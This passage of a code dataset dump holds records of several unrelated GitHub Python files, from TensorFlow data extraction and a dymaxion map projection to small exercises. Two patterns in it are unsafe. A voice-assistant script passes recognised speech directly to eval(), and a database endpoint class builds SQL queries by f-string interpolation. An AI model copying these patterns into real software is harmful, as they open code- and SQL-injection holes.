main():\n\n  args = arg_parse()\n  sess = tf.Session()\n  sess.run(tf.global_variables_initializer())\n  metadata = _read_metadata(args.data_path)\n\n  data_name = args.data_path.split('/')[-1]\n  save_dir = f'./data/{data_name}'\n  os.makedirs(save_dir, exist_ok=True)\n  json.dump(metadata, open(os.path.join(save_dir, 'metadata.json'), 'wt'))\n\n  for split in ['train', 'valid', 'test']:\n    ds = input_fn(args.data_path, split=split)\n    split_dir = os.path.join(save_dir, split)\n    os.makedirs(split_dir, exist_ok=True)\n\n    iterator = tf.data.make_one_shot_iterator(ds)\n    data = iterator.get_next()\n\n    i = 0\n    while True:\n      print(i)\n      try:\n        traj = sess.run(data)\n        traj = {'particle_type': traj[0]['particle_type'], \n                'position': traj[1]['position']}\n        pickle.dump(traj, open(os.path.join(split_dir, str(i)+'.pkl'), \"wb\"))\n        i += 1\n\n      except tf.errors.OutOfRangeError:\n        break\n\nif __name__ == '__main__':\n  main()\n","repo_name":"zhouxian/GNS-PyTorch","sub_path":"extract_tfrs.py","file_name":"extract_tfrs.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"}{"seq_id":"3188949553","text":"# factorial function\r\n\r\nn = float(input(\"Please enter a number: \"))\r\n\r\nif n<0 or not(n.is_integer()):\r\n    print(\"Please enter a non-negative integer\")\r\nelif n==0 or n==1:\r\n    print(\"The factorial is 1\")\r\nelse:\r\n    factor = 1\r\n    while(n>1):\r\n        factor*=n\r\n        n-=1\r\n    print(factor)\r\n","repo_name":"Florevens/Computational---Physics","sub_path":"#factorial function (15 Points).py","file_name":"#factorial function (15 
Points).py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39620606953","text":"import os\nfrom time import sleep\n\nimport colorama\nfrom colorama import Fore\nfrom tqdm import trange\n\nimport audioplayer\nimport logger\nimport recorder\n\nif __name__ == '__main__':\n colorama.init()\n logger.logo(f\"\"\"\n ██╗ █████╗ ██████╗ ██╗ ██╗██╗███████╗\n ██║██╔══██╗██╔══██╗██║ ██║██║██╔════╝\n ██║███████║██████╔╝██║ ██║██║███████╗\n ██ ██║██╔══██║██╔══██╗╚██╗ ██╔╝██║╚════██║\n ╚█████╔╝██║ ██║██║ ██║ ╚████╔╝ ██║███████║\n ╚════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═══╝ ╚═╝╚══════╝\n \"\"\")\n logger.info(f\"Jarvis made by: {Fore.BLUE}sdev\")\n logger.info(f\"Telegram: {Fore.BLUE}@olex2andr\\n\")\n logger.info(\"Jarvis Voice listener can work only with Russian Language at this moment.\\n\")\n\n for i in trange(10, desc=Fore.WHITE + '[' + Fore.LIGHTWHITE_EX + '!' + Fore.WHITE + '] Starting Voice Listener' + Fore.WHITE, bar_format='{desc} {percentage}%', leave=False):\n sleep(.1)\n\n logger.accent(\"Voice Listener started successfully. Type 'help' to see Jarvis commands.\")\n\n while True:\n recorded = recorder.record_volume().lower()\n if recorded == 'открой google':\n audioplayer.play('Открываю')\n os.startfile('D:/Chrome/Application/chrome.exe')\n else:\n symbols = {\n 'х': '*',\n 'x ': '* ', # python issue\n ' x': ' *', # python issue\n ',': '.'\n }\n\n for symbol, replaced in symbols.items():\n recorded = recorded.replace(symbol, replaced)\n\n try:\n math = round(eval(recorded), 4)\n logger.info(f\"Результат ({recorded}): {math}\")\n audioplayer.play(math)\n except:\n pass","repo_name":"isakolexandr/Jarvis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"17145121471","text":"# https://www.codewars.com/kata/586ee462d0982081bf001f07/train/python\n\ndef fillable(stock, merch, n):\n # Your code goes here.\n '''\n I'm not sure what the code does.\n I think I will try to understand what is going on.\n\n But I think this is what happening:\n - check if the key is available.\n '''\n final_price = ''\n if merch in stock.keys():\n available = stock[merch] \n if available >= n:\n final_price = True\n else:\n final_price = False\n else:\n final_price = False\n return(final_price)\n","repo_name":"detcitty/100DaysOfCode","sub_path":"python/unfinshed/thinkful.py","file_name":"thinkful.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26283473878","text":"# coding:utf-8\n# 试试用Python写个死循环:\nimport threading, multiprocessing\n\ndef loop():\n x = 0\n while True:\n x = x ^ 1\n\nfor i in range(multiprocessing.cpu_count()):\n t = threading.Thread(target=loop)\n t.start()\n\n# GIL锁:Global Interpreter Lock\n# 任何Python线程执行前,必须先获得GIL锁\n# 然后,每执行100条字节码,解释器就自动释放GIL锁,让别的线程有机会执行\n# 这个GIL全局锁实际上把所有线程的执行代码都给上了锁\n# 所以,多线程在Python中只能交替执行,即使100个线程跑在100核CPU上,也只能用到1个核。\n\n# Python解释器由于设计时有GIL全局锁,导致了多线程无法利用多核。多线程的并发在Python中就是一个美丽的梦。\n","repo_name":"BenjiKCF/chinesepythontutorial","sub_path":"chinese/deadloop.py","file_name":"deadloop.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40052682946","text":"from carbon_black.endpoints.base_endpoint import Endpoint\nfrom shared.models import 
Peer_Performance\nfrom datetime import datetime\n\n\nclass Peers(Endpoint):\n\n def __init__(self) -> None:\n super().__init__()\n return\n\n # returns a list of peer dicts, or an error dict on failure\n def get(self, api_endpoint: str, transaction_id: int) -> list:\n try:\n results = self.query(\n api_endpoint, f\"SELECT * FROM Peer_Performance WHERE transaction_id = {transaction_id};\")\n get_subject_ticker = self.query(\n api_endpoint, f\"SELECT ticker FROM Transaction WHERE transaction_id = {transaction_id};\")\n self.subj_ticker = get_subject_ticker[0][0]\n return self.make_peers_model(results)\n except Exception as err:\n return {\n 'error': {\n 'peers': str(repr(err))\n }\n }\n\n def make_peers_model(self, sql_results: list) -> list:\n all_results = []\n\n for item in sql_results:\n model = Peer_Performance()\n model.data['eod_id'] = item[0]\n model.data['transaction_id'] = item[1]\n model.data['date'] = item[2].strftime(\n '%Y-%m-%d') if item[2] else None\n model.data['open'] = item[3]\n model.data['high'] = item[4]\n model.data['low'] = item[5]\n model.data['close'] = item[6]\n model.data['volume'] = item[7]\n model.data['percent_change'] = item[8]\n model.data['ticker'] = item[9]\n\n if model.data['ticker'] != self.subj_ticker:\n all_results.append(model.data)\n\n return all_results\n","repo_name":"dbbring/nostradamus","sub_path":"carbon_black/endpoints/peers.py","file_name":"peers.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"4232597223","text":"import pygame as p\nimport Floorboards\nimport ButtonPanel\nimport StatisticsPanel\n\n\ndef main():\n p.init()\n screen = p.display.set_mode((600, 600))\n clock = p.time.Clock()\n Floorboards.setup(screen)\n buttons = ButtonPanel.drawButtons(screen)\n needle_toss = False\n running = True\n count = 0\n countContact = 0\n p.display.set_caption(\"PI Estimator\")\n font = p.font.SysFont('Times New Roman', 12)\n while running:\n if needle_toss == True:\n countContact = countContact + Floorboards.needle_toss(screen)\n count = count + 1\n for event in p.event.get():\n if event.type == p.QUIT:\n running = False\n if event.type == p.MOUSEBUTTONDOWN:\n if buttons[0].collidepoint(event.pos):\n needle_toss = True\n if buttons[1].collidepoint(event.pos):\n needle_toss = False\n if buttons[2].collidepoint(event.pos):\n main()\n needle_toss = False\n ButtonPanel.drawPanel(screen)\n ButtonPanel.drawButtons(screen)\n StatisticsPanel.drawPanel(screen)\n\n text = StatisticsPanel.getStatTxt(count, countContact)\n StatisticsPanel.run_text(screen, text, (420, 20), font)\n p.display.flip()\n clock.tick(10)\n p.quit()\n\n\nmain()\n","repo_name":"shaylchetty/Pi_Estimator","sub_path":"MainDart.py","file_name":"MainDart.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"6108191813","text":"import configparser\nfrom os import path\n\n\nclass Config:\n\n fname = 'tengri.conf'\n config = configparser.ConfigParser()\n config.sections()\n\n if path.isfile(fname):\n config.read(fname)\n elif path.isfile(path.expanduser('~/' + fname)):\n config.read(path.expanduser('~/' + fname))\n elif path.isfile('/tmp/' + fname):\n config.read('/tmp/' + fname)\n\n exclude_list = config['DEFAULT']['exclude_list']\n instance_state = config['DEFAULT']['instance_state']\n\nif __name__ == '__main__':\n config = Config()\n print(config.exclude_list, 
config.instance_state)\n","repo_name":"leopepe/tengri","sub_path":"tengri/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"15943108878","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\n# Read your data\ndf = pd.read_csv('insurance.csv')\n\n# Create the scatter plot\nplt.scatter(df['age'], df['charges'])\nplt.xlabel('Age')\nplt.ylabel('Charges')\nplt.title('Age vs Charges')\n\n# Show the plot\nplt.show()\n","repo_name":"maxglaser/DataScience-Portfolio","sub_path":"insurance_project/data_vis.py","file_name":"data_vis.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"38400060007","text":"import os\nimport sys\n\nfrom data import FileStream\nfrom evaluation.fgt_evaluate_prequential import FGTEvaluatePrequential\nfrom lazy.fgt_sam_knn import FGTSAMKNN\n\ncwd = os.getcwd()\nsys.path.insert(0, cwd)\n\n\n\n\"\"\"\nThis is a python program to generate evaluation results for 4 datasets with forgetting feature.\nThe aim is to compare models with the same k value and maximum window size\nthat forget different number of samples every 1000 samples seen.\nFor that purpose there are 5 forgetting values for each model: 0, 0.1, 0.25, 0.50, 0.75\n\"\"\"\n\n\"\"\"\ninitializing streams by passing csv datasets to FileStream constructor\n\"\"\"\n# stream_interchanging = FileStream('fgt-sam-knn-tests/1000-recent/interchanging-rbf/interchanging.csv')\n# stream_squares = FileStream('fgt-sam-knn-tests/1000-recent/moving_squares/squares.csv')\nstream_chessboard = FileStream('fgt-sam-knn-tests/1000-recent/chessboard/chessboard.csv')\n# stream_poker = FileStream('fgt-sam-knn-tests/1000-recent/poker/poker.csv')\n\n\"\"\"\npreparing each data stream for use\n\"\"\"\n# stream_interchanging.prepare_for_use()\n# stream_squares.prepare_for_use()\nstream_chessboard.prepare_for_use()\n# stream_poker.prepare_for_use()\n\n\ndef generate_samknn_models(k, wind_size):\n # list with number of samples to be forgotten\n n_samples_fgt = [0.1, 0.25, 0.50, 0.75]\n # initialize list of SAMKNN with model which won't have data forgotten - 25% not forget\n samknn_models = [FGTSAMKNN(n_neighbors=k, max_window_size=wind_size, fgt=False)]\n # loop to add samknn's that will have data forgotten\n for i in range(4):\n samknn_models.append(FGTSAMKNN(n_neighbors=k, max_window_size=wind_size, fgt_n_instances=n_samples_fgt[i]))\n return samknn_models\n\n\ndef generate_different_k_values_sam_knn_models(starting_k_value):\n # list that will contain lists with samknn models, each with its own 'k' values\n samknn_models_nested = []\n # loop to append to samknn_models_nested samknn models with k = [3, 5]\n for j in range(starting_k_value, 4, 2):\n samknn_models_nested.append(generate_samknn_models(j, 5000))\n return samknn_models_nested\n\n\ndef evaluate(dataset_name, stream, starting_k_value=3):\n samknn_list = generate_different_k_values_sam_knn_models(starting_k_value)\n for i in range(len(samknn_list)):\n file_name = 'results_k=' + str(samknn_list[i][0].n_neighbors) + '_ws=' + str(samknn_list[i][0].max_wind_size)\n evaluator = FGTEvaluatePrequential(max_samples=2000000,\n show_plot=False,\n pretrain_size=samknn_list[i][0].n_neighbors,\n n_wait=100,\n metrics=['accuracy'],\n output_file='fgt-sam-knn-tests/1000-recent/' + dataset_name + '/' + file_name + '.csv',\n fgt_freq=1000)\n\n 
evaluator.evaluate(stream=stream, model=samknn_list[i],\n image_name='fgt-sam-knn-tests/' + dataset_name + '/' + file_name,\n model_names=['0', '0.1', '0.25', '0.5', '0.75'])\n\n\n\"\"\"\ngenerate results for each dataset\n\"\"\"\n# evaluate('interchanging', stream_interchanging)\n# evaluate('squares', stream_squares)\nevaluate('chessboard', stream_chessboard)\n# evaluate('poker', stream_poker)\n","repo_name":"ariadnepinheiro/research-project-stream-learning","sub_path":"lazy/generate_results_for_fgt_sam_knn.py","file_name":"generate_results_for_fgt_sam_knn.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"7294064698","text":"import numpy as np\nfrom shapely.geometry import Point, Polygon, MultiPolygon\n\nfrom geometry import rotation_matrix_from_src_dest_vecs\n\nfrom polyhedra import (\n icosahedron,\n truncated_icosahedron,\n icosahedron_face_transform,\n truncated_icosahedron_face_transform,\n)\n\n# a \"map projection class\" should be capable of accepting a set of parameters, a list of lat-lon shapes,\n# and returning a corresponding list of shapes in the output/projected space.\n# for conventional planar projections, this is a simpler concept, because the output space is simply a 2D plane.\n# dymaxion projections for CNC introduce several complications:\n# - \"interruptions\" can cause input shapes to result in multiple output shapes,\n# so the input is a list of shapes but the output is a list of lists of shapes.\n# (https://en.wikipedia.org/wiki/Interruption_(map_projection))\n# - there are two output spaces:\n# - the surface of the polyhedron\n# - the 2d plane after unfolding the polyhedron\n# - the unfolding step is itself nontrivial (see polyhedra.py)\n# - any shape in the 2d plane that crosses a polyhedron face boundary\n# (even if not interrupted in the 2d layout after unfolding)\n# needs to be represented as a closed loop that coincides with that boundary.\n# this is the CNC requirement, and this is what necessitates this \"partial-identity azimuthal\"\n# intermediate \"warp\" projection.\n\n\"\"\"\nDymaxionProjection provides methods to compute a variety of dymaxion-like projections,\nfrom the sphere to a polyhedron.\n\ninit methods:\n __init__ accepts a polyhedron, either by name, or by literally specified vertices, edges, and faces\n _init_from_name and _init_from_data handle the actual initialization of these\n _init_2d calculates and caches some values that are used to transform faces, and their corresponding projected shapes, to the final 2d layout\n\nsimple API methods:\n set_projection\n project\n\nprojection implementations:\n\n project_predistort_90\n project_predistort_45\n project_simple_closed - returns closed-loop shapes in the XY plane, in proper unrolled-polyhedron position+orientation. should be called once for each (face, shape) pair. 
\"simple\" indicates \"no predistortion\"\n project_simple_archimedean_face\n project_simple_archimedean\n project_simple_platonic\n\nazimuthal_warp_projection - helper function for project_simple_closed\n\n\n\n\"\"\"\n\n\nclass DymaxionProjection(object):\n # designed to work for a regular icosahedron\n # should work for any platonic solid, any archimedean solid\n # and also another class of polyhedra that i don't know a name for:\n # those that are equivalent to spherical voronoi diagrams - that is,\n # any point on a face is closer to the central bisector of that face,\n # than to the central bisector of any other face.\n # that assumes \"central bisector\" is well-defined.\n # TODO: research this \"voronoi polyhedron\" concept\n def __init__(self, *args, **kwargs):\n if 'polyhedron' in kwargs:\n self._init_from_name(**kwargs)\n elif 'vertices' in kwargs and 'edges' in kwargs and 'faces' in kwargs:\n self._init_from_data(**kwargs)\n else:\n print('Dymaxion initialization error')\n import ipdb; ipdb.set_trace()\n\n self.projection = 'simple' # 'simple', 'predistort'\n\n def _init_from_name(self, polyhedron, mat=None):\n # TODO: also accept an \"unfolder\" which might be a class satisfying a certain interface:\n if polyhedron in ['icosahedron', '20', 'icosa']:\n pv, pe, pf = icosahedron(circumradius=1)\n self.face_transform = icosahedron_face_transform\n elif polyhedron in ['truncated-icosahedron', '32', 'soccerball']:\n pv, pe, pf = truncated_icosahedron(circumradius=1)\n self.face_transform = truncated_icosahedron_face_transform\n else:\n raise ValueError\n\n if mat is not None:\n pv = pv @ mat\n\n self._init_from_data(pv, pe, pf)\n\n self._init_2d()\n\n def _init_from_data(self, vertices, edges, faces):\n # set verts, edges, faces\n # calculate simple geometry values based on v, e, f\n self.vertices = vertices\n self.edges = edges\n self.faces = faces\n\n self.face_centers = np.array([np.mean(vertices[f], axis=0) for f in self.faces])\n self.face_center_mags = np.linalg.norm(self.face_centers, axis=1)\n self.face_unit_normals = self.face_centers / self.face_center_mags[:,None]\n\n def _init_2d(self):\n # calculate some linear transform values, and cache them.\n # these are used for:\n # 1. rotating the 3d faces (and shapes projected onto them) into the XY plane\n # 2. rotating and translating the results of (1) into the proper unfolded-polyhedron position\n # note that these are currently only used internally by project_simple_closed,\n # but they can be applied externally to the 3d results of any of the other\n # projection methods. 
project_simple_closed depends on the 2d intersection functions\n # of the Shapely library, so it has to operate in the 2d plane, whereas the other\n # projection methods produce 3d results.\n self.face_vertices_2d = {}\n self.face_transforms_3d = {}\n self.face_transforms_2d = {}\n\n for face_id in range(len(self.faces)):\n fn = self.face_unit_normals[face_id] # face normal\n fv = self.vertices[self.faces[face_id]] # face vertices\n M3 = rotation_matrix_from_src_dest_vecs(fn, [0, 0, 1]) # rotation matrix to bring face into xy plane\n fv2 = fv @ M3.T # 3d face vertices rotated to xy plane\n fx, fy, fr = self.face_transform(face_id, fv2) # 2d transformation parameters\n c, s = np.cos(fr), np.sin(fr)\n M2 = np.array([[c, -s], [s, c]]) # build 2d rotation matrix\n fv2_oriented = fv2[:, 0:2] @ M2 + [fx, fy] # apply 2d transform to face\n\n self.face_vertices_2d[face_id] = fv2_oriented\n self.face_transforms_3d[face_id] = M3\n self.face_transforms_2d[face_id] = (M2, [fx, fy])\n\n def set_projection(self, pstring):\n self.projection = pstring\n\n def project(self, xyz):\n if self.projection == 'simple':\n if len(self.faces) in [4, 6, 8, 12, 20]:\n return self.project_simple_platonic(xyz)\n else:\n return self.project_simple_archimedean(xyz)\n if self.projection == 'predistort-90':\n return self.project_predistort_90(xyz)\n if self.projection == 'predistort-45':\n return self.project_predistort_45(xyz)\n\n def project_simple_closed(self, xyz, face_id):\n # project a shape onto a single, specified face,\n # but return a closed shape rather than an open one,\n # in the case when the shape extends beyond the face.\n #\n # this requires \"clipping\", i.e. computing the intersection of\n # the face polygon with the shape polygon, which is nontrivial.\n #\n # several approaches are generally possible:\n #\n # 1. project entire shape onto the face, then compute planar intersection.\n # doesn't work because some shapes span too much of the globe, so the\n # projection explodes\n # 2. compute intersection of spherical polygons.\n # haven't yet found a decent library to do this, not worth\n # implementing myself unless necessary\n # 3. compute planar intersection within some proper azimuthal projection\n #\n # 3b. 
use some ad-hoc azimuthal projection that works well enough\n\n # given a face_id, get the corresponding face and:\n # - 3d-rotate it and its corresponding shapes onto XY plane,\n # - use the face_transform function to adjust the layout within the XY plane\n # - compute intersection of face with shapes, to clip them properly.\n\n # given the shape path `xyz`:\n # - project it from its sphere-surface xyz 3d points to an intermediate projection\n # this retains the shape as is, in the vicinity of the face, but condenses the rest of it,\n # so that the polyhedron-face projection doesn't blow up\n # - project the intermediate projection onto the (single known face of the) polyhedron\n # - transform the fully-projected shape to the xy plane, in correct poly-net orientation\n # - compute intersection of shape and face\n\n\n projected = {}\n\n fn = self.face_unit_normals[face_id] # face normal\n M3 = self.face_transforms_3d[face_id] # rotation matrix to bring face into xy plane\n M2, dxy = self.face_transforms_2d[face_id] # transform for bringing face/shape to final position+orientation\n fv2 = self.face_vertices_2d[face_id]\n poly_face = Polygon(fv2)\n\n def poly_intersection(face, shape):\n geometry_error = False\n\n clipped = None\n try:\n clipped = shape.intersection(face)\n except Exception as exc:\n print(' invalid geometry')\n geometry_error = True\n\n paths = []\n if type(clipped) == Polygon:\n # convert single polygon to multipolygon\n clipped = MultiPolygon([clipped])\n\n if type(clipped) == MultiPolygon:\n for poly in clipped:\n paths.append(np.vstack(poly.exterior.coords.xy).T)\n\n return paths, geometry_error\n\n\n # the same sequence of operations is done on both the original shape and the \"warped\" shape\n # because geometry flaws can break either (or both) of the resulting intersections\n proj3d = self.project_simple_archimedean_face(xyz, face_id)\n proj2d = proj3d @ M3.T\n proj2d_oriented = proj2d[:, 0:2] @ M2 + dxy\n poly_shape = Polygon(proj2d_oriented)\n\n\n warped = azimuthal_warp_projection(xyz, fn)\n\n proj3d_warped = self.project_simple_archimedean_face(warped, face_id)\n proj2d_warped = proj3d_warped @ M3.T\n proj2d_warped_oriented = proj2d_warped[:, 0:2] @ M2 + dxy\n poly_shape_warped = Polygon(proj2d_warped_oriented)\n\n projected['unwarped'], gerror_unwarped = poly_intersection(poly_face, poly_shape)\n projected['warped'], gerror_warped = poly_intersection(poly_face, poly_shape_warped)\n\n if not gerror_unwarped:\n projected['final'] = projected['unwarped']\n elif not gerror_warped:\n projected['final'] = projected['warped']\n else:\n projected['final'] = []\n # known to happen on face 5, with antarctica's \"main\" section\n import matplotlib.pyplot as plt\n plt.plot(proj2d_oriented[:,0], proj2d_oriented[:,1],'r')\n plt.plot(fv2[:,0], fv2[:,1],'g')\n import ipdb; ipdb.set_trace()\n\n return projected\n\n def project_predistort_90(self, xyz):\n # plot shapes projected onto polyhedron of nonzero thickness,\n # but in such a way that after sanding the polyhedron to a sphere,\n # the shapes match what they should be for the sphere.\n # the \"90\" refers to using an end mill (90 degrees from the plane)\n # to cut out the shapes, which means the extrusion of the shapes\n # through the thick face is perpendicular to the face.\n #\n # specifically: for each point `pt` in path,\n # 1. project onto insphere (call this `pts`)\n # 2. 
find intersection of\n # a) line through pts, with direction vector = face_normal\n # b) plane of the face\n\n\n R_ci = 1.258408572364819 # ratio of icosahedron circumradius/inradius\n # gives insphere radius relative to vertex magnitude\n print('WARNING: project_predistort_90 is not implemented generically') # TODO\n\n pxyz = []\n best_faces = []\n for pt in xyz:\n face_axis_angles = np.arccos(np.sum(pt/np.linalg.norm(pt) * self.face_unit_normals, axis=1))\n best_face_id = np.argmin(face_axis_angles)\n best_faces.append(best_face_id)\n\n fc = self.face_centers[best_face_id] # arbitrary point on plane\n fn = self.face_unit_normals[best_face_id] # normal to plane\n\n # project pt onto insphere first...\n pts = np.linalg.norm(self.vertices[0])/R_ci * pt/np.linalg.norm(pt)\n\n # ...then project that point, through a line perpendicular to the face,\n # onto the face\n s = np.dot(fc-pts, fn) / np.dot(fn, fn)\n projected = pts + fn * s\n\n # TODO - why are paths that cross polyhedron edges no longer contiguous\n # that might be expected... hard to be sure\n\n \"\"\"\n (p-fc).fn = 0 # (p-p0).n = 0\n p = pt + fn*d # p = l0 + l*d\n ((pt + fn*d)-fc).fn = 0 # ((l0+l*d)-p0).n = 0\n (pt + fn*d - fc).fn = 0\n pt.fn + d*fn.fn - fc.fn = 0\n d*fn.fn = fc.fn - pt.fn\n d = (fc-pt).fn/(fn.fn)\n p = pt + fn*d\n p = pt + fn * (fc-pt).fn/(fn.fn)\n \"\"\"\n\n pxyz.append(projected)\n\n return np.array(pxyz), best_faces\n\n def project_predistort_45(self, xyz):\n # similar concept to predistort_90, but here the \"45\" refers\n # to using a v-groove bit with a 45 angle off the plane,\n # so the exxtrusion of the shapes through the thick face is\n # at a 45-degree angle. should also be able to generalize this\n # to arbitrary other angles (but really just 30, 60)\n raise NotImplementedError\n\n def project_simple_archimedean_face(self, xyz, face_id):\n # project a shape entirely onto a single, specified face.\n # used when computing the proper 2D intersection of the shape\n # with the face polygon - only the points that get projected onto\n # the face should result from that intersection\n\n pxyz = []\n fc = self.face_centers[face_id] # arbitrary point on plane\n fn = self.face_unit_normals[face_id] # normal to plane\n num = np.dot(fc, fn)\n for pt in xyz:\n s = num/np.dot(pt, fn)\n # TODO if too far away from the face, then...?\n pxyz.append(pt * s)\n\n return np.array(pxyz)\n\n def project_simple_archimedean(self, xyz):\n # for each point in the shape:\n # - select corresponding face\n # - use equation of plane to project point onto polyhedron.\n # note this is a \"dymaxion projection\", which requires finding\n # the intersection of a ray and a plane, /not/ the projection of\n # that ray onto the plane, as you might mistakenly assume\n # thanks to the overloaded term \"projection\".\n\n # specifically: for each point `pt` in path,\n # find intersection of\n # a) line through `pt` with direction vector = `pt`\n # b) the plane of the face\n\n pxyz = []\n best_faces = []\n k = 2\n for pt in xyz:\n # figure out which face this point belongs to.\n #\n # instead of just choosing the smallest face_axis_angle, look at the\n # two smallest, find the corresponding point-on-face for both, and\n # choose the one that is closer to the centroid of the polyhedron.\n #\n # this is a quick and dirty solution to the problem that the method\n # of just choosing the smallest angle only works for platonic solids.\n # there may be a way that is more \"correct\", but this seems like it will\n # be about as fast as we can hope for?\n 
#\n # another idea: find a multiplicative factor to apply to the computed\n # angles, based on the size of the face. not sure if this makes sense.\n #\n # see project_simple_platonic for geometry explanation\n\n face_axis_angles = np.arccos(np.sum(pt/np.linalg.norm(pt) * self.face_unit_normals, axis=1))\n\n # argpartition sorts the input array, but only enough that the\n # first k values are in ascending order, which is all we need\n idxs = np.argpartition(face_axis_angles, k)\n\n min_rad = 10 * np.linalg.norm(self.vertices[0])\n min_projected = []\n\n for i in range(k):\n fc = self.face_centers[idxs[i]] # arbitrary point on plane\n fn = self.face_unit_normals[idxs[i]] # normal to plane\n s = np.dot(fc, fn)/np.dot(pt, fn)\n projected = pt * s\n rad = np.linalg.norm(projected)\n if rad < min_rad:\n min_rad = rad\n min_projected = projected\n best_face_id = idxs[i]\n\n best_faces.append(best_face_id)\n pxyz.append(min_projected)\n\n\n return np.array(pxyz), best_faces\n\n def project_simple_platonic(self, xyz):\n # for each point in the shape:\n # - find which face-line has smallest angle, select that plane\n # - use equation of plane to project point onto polyhedron.\n # note this is a \"dymaxion projection\", which requires finding\n # the intersection of a ray and a plane, /not/ the projection of\n # that ray onto the plane, as you might mistakenly assume\n # thanks to the overloaded term \"projection\".\n\n # specifically: for each point `pt` in path,\n # find intersection of\n # a) line through `pt` with direction vector = `pt`\n # b) the plane of the face\n\n pxyz = []\n best_faces = []\n for pt in xyz:\n # figure out which face this point belongs to\n face_axis_angles = np.arccos(np.sum(pt/np.linalg.norm(pt) * self.face_unit_normals, axis=1))\n best_face_id = np.argmin(face_axis_angles)\n best_faces.append(best_face_id)\n\n # find intersection of line (O, p) with plane with point fc and normal fn\n fc = self.face_centers[best_face_id] # arbitrary point on plane\n fn = self.face_unit_normals[best_face_id] # normal to plane\n s = np.dot(fc, fn)/np.dot(pt, fn)\n projected = pt * s\n\n \"\"\"\n https://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection#Algebraic_form\n (p-fc).fn = 0 # (p-p0).n = 0\n p = 0 + pt*d # p = l0 + l*d\n ((pt*d)-fc).fn = 0 # ((l0+l*d)-p0).n = 0\n (pt*d).fn - fc.fn = 0\n d * pt.fn - fc.fn = 0\n d = fc.fn/pt.fn\n p = pt * d\n p = pt * fc.fn/pt.fn\n \"\"\"\n\n \"\"\"\n # project p onto the face\n vv = p - fc\n v_parallel = np.dot(vv, fn) / np.linalg.norm(fn) ** 2 * fn # component parallel to the normal\n v_perp = vv - v_parallel # component perpendicular to the normal\n projected = fc + v_perp\n \"\"\"\n\n pxyz.append(projected)\n\n return np.array(pxyz), best_faces\n\n\ndef azimuthal_warp_projection(xyz, c):\n # project Nx3 shape `xyz` to the plane with normal `c`, (TODO: what plane? what projection?)\n # using a goofy azimuthal projection that is identity under some limit,\n # and asymptotically approaches pi/2 above the limit. 
this maps the\n # entire sphere to the hemisphere centered on `c`, which simplifies computation\n # of intersections of oversized spherical polyhedra.\n\n x0, y0, y1 = np.pi * 0.14, np.pi * 0.14, np.pi*0.5 # limit for truncated icosahedron is tan(1/2.478) = pi*0.1350\n h, k, m = x0+y0-y1, y1, -(y1-y0)**2\n f = lambda x: (m + k*(x-h))/(x-h)\n # this is a piecewise, asymptotic function designed such that\n # f(x) = x for x < x0 (this case is handled outside of the lambda)\n # f(x0) = y0\n # f'(x0) = 1\n # f(inf) -> y1\n\n proj = []\n for pt in xyz:\n if np.linalg.norm(pt) < 1e-15:\n # dumb glitch\n continue\n\n # TODO: comment this\n a = np.arccos(np.dot(pt, c)/(np.linalg.norm(pt)*np.linalg.norm(c)))\n\n # TODO: comment this, separate into function\n # https://en.wikipedia.org/wiki/Slerp\n omega = np.arccos(np.dot(pt, c))\n #if omega == 0:\n # db()\n t = 1\n if a >= x0:\n t = f(a)/a\n v = np.sin((1-t)*omega)/np.sin(omega) * c + np.sin(t*omega)/np.sin(omega) * pt\n\n # TODO: comment this\n axis = np.cross(c, pt)\n proj.append(v)\n\n return np.array(proj)\n","repo_name":"alanbernstein/dymaxion","sub_path":"dymaxion.py","file_name":"dymaxion.py","file_ext":"py","file_size_in_byte":20734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"42761666437","text":"import tensorflow as tf\nimport os.path\nimport ResNet_\nfrom tensorflow.python.framework import graph_util\nimport tensorflow.contrib.slim.python.slim.nets.vgg as vgg\nimport tensorflow.contrib.slim as slim\nimport SqueezeNet\n\nlabels_nums = 5 # 类别个数\nbatch_size = 32 #\nresize_height = 224 # mobilenet_v1.default_image_size 指定存储图片高度\nresize_width = 224 # mobilenet_v1.default_image_size 指定存储图片宽度\ndepths = 3\ndata_shape = [batch_size, resize_height, resize_width, depths]\n\ninput_images = tf.placeholder(dtype=tf.float32, shape=[None, resize_height, resize_width, depths], name='input')\n\n# 定义input_labels为labels数据\ninput_labels = tf.placeholder(dtype=tf.int32, shape=[None, labels_nums], name='label')\n\n\ndef load_variables_from_checkpoint(sess, start_checkpoint):\n \"\"\"Utility function to centralize checkpoint restoration.\n\n Args:\n sess: TensorFlow session.\n start_checkpoint: Path to saved checkpoint on disk.\n \"\"\"\n saver = tf.train.Saver(tf.global_variables())\n saver.restore(sess, start_checkpoint)\n\n\ndef main():\n # ckpt_path = 'models/resnet18_x3_old/best_models.ckpt'\n ckpt_path = './models/SqueezeNet_07/best_models.ckpt'\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n # out = 